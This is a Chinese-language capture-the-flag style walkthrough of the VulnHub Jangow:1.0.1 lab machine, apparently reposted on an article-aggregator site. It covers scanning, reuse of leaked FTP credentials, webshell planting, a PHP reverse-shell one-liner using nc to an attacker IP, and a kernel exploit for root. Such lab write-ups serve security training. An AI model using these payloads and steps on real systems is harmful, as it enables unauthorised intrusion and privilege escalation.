VulnHub Jangow:1.0.1 渗透测试练习详解

这篇具有很好参考价值的文章主要介绍了VulnHub Jangow:1.0.1 渗透测试练习详解。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

jangow:1.0.1

日常练习

0x01 信息收集

nmap老规矩扫一扫
VulnHub Jangow:1.0.1,渗透测试,信息收集
192.168.56.118存活,80端口和21端口开着。
VulnHub Jangow:1.0.1,渗透测试,信息收集
VulnHub Jangow:1.0.1,渗透测试,信息收集
逛了一圈没看到什么有价值的信息,爆破一下路径看看。
VulnHub Jangow:1.0.1,渗透测试,信息收集
site目录刚刚看过了,.backup看看是什么
VulnHub Jangow:1.0.1,渗透测试,信息收集
这里面有数据库的账户密码,暂时不知道是用在哪。到这里没有什么有用的了。


0x02 FTP登录

刚刚端扫扫出来的另一个21端口,利用windows的直接在文件路径下键入

ftp://192.168.56.118

这里需要输入账户密码,匿名登陆登不上去,这里用刚刚网页上看到数据库密码

jangow01
abygurl69

VulnHub Jangow:1.0.1,渗透测试,信息收集
登录成功,路径应该是/var/www/,进入html/site下
VulnHub Jangow:1.0.1,渗透测试,信息收集
有一个busque.php文件,。


0x03 后门连接

查看发现是一个后门
VulnHub Jangow:1.0.1,渗透测试,信息收集
利用这个后门再写一个后门(连个蚁剑)
VulnHub Jangow:1.0.1,渗透测试,信息收集
写入成功
VulnHub Jangow:1.0.1,渗透测试,信息收集
尝试连接蚁剑
VulnHub Jangow:1.0.1,渗透测试,信息收集
连接成功


0x04 反弹shell

连个蚁剑方便上传文件,因为直接用nc反弹不了蚁剑,这里只能用php反弹shell,写入shell.php

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 443 >/tmp/f");?>

百度到一个反弹shell,这里用443是因为只能用这个端口才能,其他端口做了限制。
在本地开启监听

nc -lvvp 443

然后访问

http://192.168.56.118/site/shell.php

VulnHub Jangow:1.0.1,渗透测试,信息收集
成功反弹shell


0x05 切换用户

可以看看/etc/passwd文件有哪些用户

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:111:118:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:112:119:MySQL Server,,,:/nonexistent:/bin/false

有一个jangow01用户,jangow01目录下有一个user.txt文件
VulnHub Jangow:1.0.1,渗透测试,信息收集
看着像md5,拿去解密看看
VulnHub Jangow:1.0.1,渗透测试,信息收集
猜测应该是jangow01的密码。
但是这里尝试了jangow01的密码不是解得的密码,于是想到原来数据库密码。
VulnHub Jangow:1.0.1,渗透测试,信息收集
登录成功。


0x06 提升权限

查看一下linux内核版本

uname -a

VulnHub Jangow:1.0.1,渗透测试,信息收集
用kali查看可利用的exp
VulnHub Jangow:1.0.1,渗透测试,信息收集
下载到当前目录
VulnHub Jangow:1.0.1,渗透测试,信息收集
然后利用蚁剑上传到目标主机的tmp目录
VulnHub Jangow:1.0.1,渗透测试,信息收集
编译45010.c文件
VulnHub Jangow:1.0.1,渗透测试,信息收集
编译后得到exp文件,运行
VulnHub Jangow:1.0.1,渗透测试,信息收集
提权成功!查看root目录拿flag
VulnHub Jangow:1.0.1,渗透测试,信息收集
完结撒花!

0x07 总结

考完试来做做练习(哈哈考试全过开心),简单的练习,好久没做了。文章来源地址https://www.toymoban.com/news/detail-801201.html

到了这里,关于VulnHub Jangow:1.0.1 渗透测试练习详解的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • kali渗透测试系列---信息收集

    信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再到 web 应用开发的语言等等的种类多如繁星我们一个个的尝试,什么时候才是一个头。 而对于信息的收集我们主要从这样的几个方面来收

    2024年02月03日
    浏览(45)
  • 渗透测试之信息收集篇-服务器子域名收集

    你可能对某个服务器渗透失败,没有发现入侵点,所以我们可以考虑扩大攻击面,对target.com的子域名 进行渗透,然后横向移动。 使用bbot对目标子域进行收集 https://github.com/blacklanternsecurity/bbot/wiki#installation 关于子域名收集,推荐一篇很好的文章,文章地址:https://blog.blackl

    2024年02月16日
    浏览(37)
  • 渗透测试-C段主机信息收集

    提示:提示:注意:网络安全环境需要大家共同维护,请大家共同遵守网络安全规章制度,仅供大家参考,造成的法律后果,不由本人承担 学过计算机的同学都知道IP地址这一个概念,IP地址又可以分为A类,B类,C类等,A类的网络位为8位,主机位24位,B类的网络位为16位,主

    2024年02月06日
    浏览(49)
  • 渗透测试-第一步 信息收集 【详细介绍】

    1. 信息收集 黑客的第一步要做的事情永远是信息收集 同样渗透也是 什么是信息收集? 信息收集是最具有灵魂的一步,通常拿到渗透测试站,需要对该站进行信息收集,只有收集到了足够多的信息后,对方暴露出来的问题越多,信息越多,攻击的面也越广。知己知彼百战百胜

    2023年04月18日
    浏览(85)
  • 《渗透测试》-前期信息收集及工具介绍01(信息收集简介、JSFinder、OneForAll)

    信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进 行。比如目标站点IP、中间件、脚本语言、端口、邮箱等等。信息收集包含资产收集 但不限于资产收集。 1、信息收集是渗透测试成功的保障 2、更多的暴露面 3、更大的可能性 1、主动信息收

    2024年02月03日
    浏览(55)
  • 渗透测试 ---利用Kali进行简单的信息收集

    目录 Kali环境安装配置更新 Linux镜像文件下载地址 默认用户名 更新命令 网络环境配置 二层发现 原理 工具 arping netdiscover 三层发现 原理 工具 ping fping hping3 四层发现 原理 工具 nmap hping3 Python脚本 端口扫描 原理 工具 nmap Dmitry netcat 端口Banner信息获取 原理 工具 nmap dmitry netcat

    2024年02月05日
    浏览(56)
  • 从零开始的Web渗透:信息收集步骤详解

    什么是Whois Whois是一种传输协议,用于查询域名注册所有者等信息。它可以帮助您查询域名是否已被注册,以及获取有关已注册域名的详细信息,例如域名注册商和域名所有人。 早期的Whois查询通常使用命令行接口。现在,一些网页接口简化了在线查询工具,使您可以一次向

    2024年02月11日
    浏览(43)
  • 网络安全|渗透测试入门学习,从零基础入门到精通—收集信息篇

    目录 前面的话 1、收集域名信息 1.1、Whois查询 ​编辑1.2、备案信息查询  2、收集敏感信息 3、收集子域名信息 3.1、子域名检测工具 3.2、搜索引擎枚举 3.3、第三方聚合应用枚举 3.4、证书透明度公开日志枚举 本章小结 本人喜欢网络完全的一些知识,自学一些。现在写出来和大

    2024年02月08日
    浏览(53)
  • 渗透测试vulnhub——Web-2.0

    目录 1、信息收集 2、漏洞利用  3、John爆破 4、命令执行漏洞 5、lxd提权  知识点: 下载地址:AI: Web: 2 ~ VulnHub 1、信息收集 使用 arp-scan -l 查看靶机ip    靶机:192.168.29.133  进行服务扫描: -sV -A -p- -O     开启了   22tcp  80http  系统:linux -sv 服务信息、-A详细信息、-p- 所有端

    2024年01月17日
    浏览(45)
  • vulnhub_DeRPnStiNK靶机渗透测试

    VulnHub2018_DeRPnStiNK靶机 https://www.vulnhub.com/entry/derpnstink-1,221/ flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd) 信息收集 使用nmap扫描靶机发现开放了 21 22 80 端口,

    2024年02月08日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包